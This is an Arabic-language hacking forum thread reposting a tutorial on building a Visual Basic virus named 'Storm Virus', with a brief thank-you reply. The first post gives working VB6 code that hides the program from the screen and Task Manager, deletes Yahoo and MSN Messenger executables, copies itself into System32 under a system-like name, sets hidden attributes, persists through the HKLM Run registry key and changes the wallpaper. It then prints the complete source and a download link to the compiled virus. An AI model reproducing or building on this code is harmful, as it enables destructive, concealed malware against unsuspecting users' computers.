التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قسم البرمجة ولغاتها .:: ] > قسم البرمجة الكائنية

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 01-26-2017, 12:38 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية mimo-dz
 

 

 
إحصائية العضو








mimo-dz غير متواجد حالياً

إرسال رسالة عبر Skype إلى mimo-dz

 

 

إحصائية الترشيح

عدد النقاط : 10
mimo-dz is on a distinguished road

منقول موضوع قديم هام جدا للاعضاء الجدد مثبت


مشروع صناعة فيروس بالغة الفيجول بيسك
بسم الله الرحمن الرحيم
مـــنــتــديـــات العـــــــــــــــاصفـــــــــــة / قسم الفيجول بيسك
مـــــــــشروع صنـــاعــة فـــيروس بالغة الفيـــــجول بيــــــــــسك
السلام عليكم..
أتمنى إن يكون الجميع بصحة جيدة بعد غيابي عن المنتدى قررت إن أقوم بمشروع خاص بصناعة الفيروسات و لكن هذه المرة باستخدام لغة الفيجول بيسك و سوف نتعلم اليوم كيف صناعة فيروس قوي و بمواصفات جيدة إن شاء الله ينال إعجابكم و إي استفسار أو سؤال أنا جاهز للاجابة إن شاء الله إذن فل نبدأ على بركة الله...
طبعاً قبل البدأ اود ان اقول ان رأيت عناوين مواضيع جديدة في قسم الفيجول بيسك اود ان اشكر في هذا الموضوع جميع من يساهم في تطوير و تجميل هذا القسم و جميع الاقسام ...
المواصفات:
1.التشغيل عند بدأ تشغيل الحاسوب
2.إخفاء الفيروس عند التشغيل أي يصبح Hidden
3.حذف نفسه من قائمة Task Manager إي عند الضغط على (alt+ctrl+delete) لا يظهر
4.تدمير الملفات و البرامج (في مثالنا هذا سوف نقوم بتدمير كل من برنامج Yahoo و MSN )
5.نسخ الفيروس نفسه في عدة اماكن من اجل ضمان عدم حذفه من الجهاز بكل سهولة او بأستخدام امر Format
6.من اجل اضافة مميزة سوف نقوم بوضع امر تغير خلفية سطح المكتب الخاص بالضحية (له ثوابته سوف نتحدث عنه لاحقاً)
7.استخدم عبارات التكرار من اجل تدمير الجهاز إذ أردنا بأصوات من الحاسوب
اخواني الاعزاء اود ان اقول ان هذا الدرس ليس للمبتدئين .. بل للمتوسط و محترف فقط !!
الان نحتاج الى Form & Modue فقط.
سوف اعطي كل كود و سببه و اين يوضع ... |82|
كود الاخفاء .. اي عند تشغيل الفيروس لا يظهر للضحية اي شيء :
كود:
Me.Hide
او ممكن من لوحة الخصائص Properties نذهب الى الخاصية visible و نحول القيمة الخاصة به من True الى False ..
الان فل ننتقل الى كيفية اخفاء الفيروس عن Task Manager ...
طبعاً اريد ان اوضح شيء مهم . بعض الاشخاص يقولون ان هذا الكود غير فعال لكن هذا الكود في الحقيقة هو فعال و سوف اوضح ذالك .. الان اضغط على ثلاث ازرار في نفس الوقت هي Alt+Ctrl+Delete سوف يظهر لديك نافذة Task Manager .
(الان ... يوجد اربعة نوافذ ما يهمنا الان هما الاول Applications و الثانية Processes ان عمل الكود هو اخفاء الفيروس من النافذة الاول اي Applications اما عن الثانية سوق يكون موجود و يمكن حذفه . و لكن يوجد حل جيد من اجل ضمان عدم حذفه .. و هو تغير اسم الفيروس الى اسم خاص بالنظام و هكذا لا اعتقد ان الضحية سوف يمحسه .)
الان فل نكتب الكود الذي نتحدث عنه أي اخفاء الفيروس من Task Manager
كود:
App.TaskVisible = False
تغير خلفية سطح المكتب ...
قم بوضع هذا الكود في Module :
كود:
Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Public Const SPI_SETDESKWALLPAPER = 20
هذا من اجل تعريف المتغيرات الخاصة بهذه العملية و استخدام الدوال التي تعمل على التنفيذ ...
ثم قم بوضع هذا الكود في المكان المناسب أي لوحة العمل :
كود:
Dim lngSuccess As Long
Dim strBitmapImage As String
strBitmapImage = "C:\WINDOWS\pchealth\helpctr\System\Remote Assistance\Interaction\Server\StopControl.bmp"
lngSuccess = SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, strBitmapImage, 0)
يمكنك وضع الامتداد الخاص بالصورة بدل الامتداد لكن طبعاً يجب ان يكون امتداد الصورة موجود لديه او وضع الصورة مع الفيروس و من ثم اختصار الامتداد الى الملف .
اريد ان اوضح ان هذا الكود يتعامل فقط مع صور من نوع Bitmap اي ذات الامتداد bmp
الان الكودات الخاصة بحذف كل من yahoo و msn نبدا بـ yahoo :
كود:
Open "C:\Program Files\Yahoo!\Messenger\*.EXE" For Input As #1
Close
Call Kill("C:\Program Files\Yahoo!\Messenger\*.EXE")
Exit Sub
في السطر الاول نتأكد من ان البرنامج موجود اما الاخر فهو امر kill من اجل حذفه ... و نفس الشيء مع msn لكن فقط تغير امتداد ...
كود:
Open "C:\Program Files\MSN Messenger\*.EXE" For Input As #1
Close
Call Kill("C:\Program Files\MSN Messenger\*.EXE")
Exit Sub
كود النسخ ..بأستخدام الامر file copy ...
كود:
FileCopy (App.Path & "\name_virus.exe"), ("C:\Windows\System32\Storm Virus.exe")
في هذا الكود سوف يقوم بنسخ الفيروس في ملف SYSTEm 32 في مجلد ويندوز و يمكنك تكرار الكود و تغير الامتداد الى عدة مناطق في الحاسب .
كود الاخفاء : اي يصبح الفيروس مخفي نقوم بتحويل قيمته الى Hidden
كود:
SetAttr "C:\Windows\System32\name_virus.exe", vbHidden
و سوف اضيف كود اخر لجعل الفيروس ReadOnly
SetAttr "C:\Windows\System32\name_virus.exe", vbReadOnly
الان التشغيل عند بدا التشغيل .......
ضع هذا الكود في الموديل :
كود:
Option Explicit
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long
Private Const READ_CONTROL = &H20000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_NOTIFY = &H10
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
Private Const KEY_EXECUTE = KEY_READ
Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL
Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Private Const HKLM = &H80000002
Dim hKey As Long
Dim Ret As Long
Public Sub RunWhenStartup(ProgramName As String, ProgramPath As String)
Dim hKey As Long
Dim Ret As Long
Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey)
Ret = RegSetValueEx(hKey, ProgramName, 0&, 1, ProgramPath, Len(ProgramPath)) 'LenB(StrConv(TheData, vbFromUnicode)) + 1)
RegCloseKey hKey
End Sub
الان ضع هذا الكود في الفورم لتشغيل الفيروس :
كود:
RunWhenStartup "virus name", App.Path & "\" & App.EXEName & ".exe"
الان هذا فيروس متكامل و لكن نستطيع وضع خاصية قوية جدا جدا و 9هي التكرار فقط اضف lable و ضع هذا الكود في الفورم :
كود:
lable1.Caption = “0”
While Score.Caption < 10
Beep
Wend
...................................
معالجة الاخطاء .
ربما يحدث خطاء اثناء عملك لهذا قم بوضع معالج اخطاء و هذا بسيط ضع هذا الكود في بداية الفورم اقصد اول كود قبل اي كود :
كود:
Private Sub ErrorRepair()
On Error Resume Next
End Sub
و من ثم ضع بعد كل كود Call ErrorRepair من اجل ضمان عدم حدوث اخطاء .
اخيراً اتمنى ان ينال رضاكم الدرس و اعذروني لان الدرس ليس منسق بشكل جيد و لا يوجد صور و السبب ان هذا المشروع قد اعددته منذوا مده و احببت ان اضعه و بسبب ضيق الوقت لدي اما الان سوف اضع لكم الفيروس الذي انا صنعته و سميته Storm Virus مع مضاد له اي اذ شغلت الفيروس سوف يوقفه عن العمل و سوف اضع مواصفات الفيروس......
Storm Virus
1.التشغيل عند بدا تشغيل الجهاز
2.يحذف كل من برنامجي الياهو و msn
3.يغير خلفية سطح المكتب و حتى اذ غيرته سوف تعود
4.مخفي عند التغشيل
5.مخفي من قائمة alt+ctrl+del
6.الحجم : 24.0 KB
و اود ان اقول ان هذا الفيروس لا يحوي على اي اخطاء لاني ابقيته تحت التجربة و الحمد لله فعال و قوي .. و يوجد ايضاً مضاد له سوف ارفقه اسمه Anti Storm Virus ...
سوف يكون في المرفقات الفيروس Storm Virus و المضاد الخاص به .
|579|
على فكرة ممكن اتضيفون بعض الكودات و موجود موايع مثل مكتبة الاكواد ..
اخيراُ احب ان اهدي هذا الدرس الى اخي العزيز RAAD خاصة و كل اعضاء منتدى العاصفة...و اعذروني على اي خطا و اي سؤال انا حاظر لكن المشكلة ليس لدي وقت كثير سوف احاول القدوم في يوم اخر ان شاء و لكن ممكن اي شخص من الاعضاء اذ كان يملك الاجابة اتمنى ان يساعدكم و الاخ الصقر الجارح ان شاء الله ما يقصر و الان هذا كود الفيروس الذي انا صنعته كامل :
في الفورم :
كود:
Private Sub ErrorRepair()
On Error Resume Next
End Sub
Private Sub Form_Load()
Call ErrorRepair
Dim lngSuccess As Long
Dim strBitmapImage As String
strBitmapImage = "C:\WINDOWS\pchealth\helpctr\System\Remote Assistance\Interaction\Server\StopControl.bmp"
lngSuccess = SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, strBitmapImage, 0)
Me.Hide
App.TaskVisible = False
'Yahoo File
On Error GoTo Error:
Open "C:\Program Files\Yahoo!\Messenger\*.EXE" For Input As #1
Close
Call Kill("C:\Program Files\Yahoo!\Messenger\*.EXE")
Exit Sub
'MSN Messenger File
On Error GoTo Error:
Open "C:\Program Files\MSN Messenger\*.EXE" For Input As #1
Close
Call Kill("C:\Program Files\MSN Messenger\*.EXE")
Exit Sub
Error:
Call ErrorRepair
RunWhenStartup "Virus Storm", App.Path & "\" & App.EXEName & ".exe"
End Sub
في الموديل :
كود:
Option Explicit
Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Public Const SPI_SETDESKWALLPAPER = 20
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long
Private Const READ_CONTROL = &H20000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_NOTIFY = &H10
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
Private Const KEY_EXECUTE = KEY_READ
Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL
Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Private Const HKLM = &H80000002
Public Sub RunWhenStartup(ProgramName As String, ProgramPath As String)
Dim hKey As Long
Dim Ret As Long
Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey)
Ret = RegSetValueEx(hKey, ProgramName, 0&, 1, ProgramPath, Len(ProgramPath)) 'LenB(StrConv(TheData, vbFromUnicode)) + 1)
RegCloseKey hKey
End Sub
للتحميل الفيروس و المضاد اضغط هنا ...http://3ssom.com/uploader/uploads14/...122::122::122:




l,q,u r]dl ihl []h gghuqhx hg[]] lefj

التوقيع

تعشق الموت لكي لا تعشقنا الحياة
فدخلت مدارس الهاكر لتعاقب الحقراء
فتعلمت فنون الهاكر بكل أنواع الجنون
تعلمت حين تقول نعم ... فقط من أجل العيون
الهاكر حرب ... وكل من قادها يا عمرى مجنون
لا تسأل من تكون ؟
انت من كتب دستور الهاكر ... وأنت من وضع له قانون

 


التعديل الأخير تم بواسطة mimo-dz ; 01-26-2017 الساعة 12:44 AM.

   

رد مع اقتباس
قديم 02-22-2017, 04:25 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية abdo52
 

 

 
إحصائية العضو







abdo52 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abdo52 is on a distinguished road

افتراضي رد: موضوع قديم هام جدا للاعضاء الجدد مثبت


شكرا لك

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:51 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0